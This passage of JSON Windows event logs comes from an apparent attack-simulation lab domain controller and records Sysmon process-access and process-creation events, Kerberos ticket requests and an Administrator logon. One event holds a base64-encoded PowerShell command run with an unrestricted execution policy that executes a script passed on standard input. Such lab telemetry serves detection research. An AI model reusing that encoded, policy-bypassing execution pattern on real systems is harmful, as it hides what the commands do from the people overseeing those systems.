eivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4580,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.939\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001075D20600}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.939","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001075D20600}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4581,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.986\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.986","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220510,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220511,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{EB91402E-9BD5-4DA7-291F-50A2B141A228}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{EB91402E-9BD5-4DA7-291F-50A2B141A228}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220512,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{EB91402E-9BD5-4DA7-291F-50A2B141A228}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{EB91402E-9BD5-4DA7-291F-50A2B141A228}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220513,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6DE44\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{EB91402E-9BD5-4DA7-291F-50A2B141A228}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6de44","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{EB91402E-9BD5-4DA7-291F-50A2B141A228}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220514,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6DE44\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6de44","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4582,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.997\r\nProcessGuid: {41C8662E-20BF-5F25-0000-001058DE0600}\r\nProcessId: 4068\r\nImage: C:\\Windows\\System32\\chcp.com\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Change CodePage Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CHCP.COM\r\nCommandLine: \"C:\\Windows\\system32\\chcp.com\" 65001\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20BF-5F25-0000-0020C6C20600}\r\nLogonId: 0x6C2C6\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD\r\nParentProcessGuid: {41C8662E-20BF-5F25-0000-001075D20600}\r\nParentProcessId: 4152\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.997","ProcessGuid":"{41C8662E-20BF-5F25-0000-001058DE0600}","Image":"C:\\Windows\\System32\\chcp.com","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Change CodePage Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"CHCP.COM","CommandLine":"\"C:\\Windows\\system32\\chcp.com\" 65001","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20BF-5F25-0000-0020C6C20600}","LogonId":"0x6c2c6","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD","ParentProcessGuid":"{41C8662E-20BF-5F25-0000-001075D20600}","ParentProcessId":"4152","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4583,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.986\r\nSourceProcessGUID: {41C8662E-20BF-5F25-0000-001075D20600}\r\nSourceProcessId: 4152\r\nSourceThreadId: 2008\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001058DE0600}\r\nTargetProcessId: 4068\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66f32ed5(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3faf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3c80(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e85095(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66394816(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663f2ce5(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d634a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+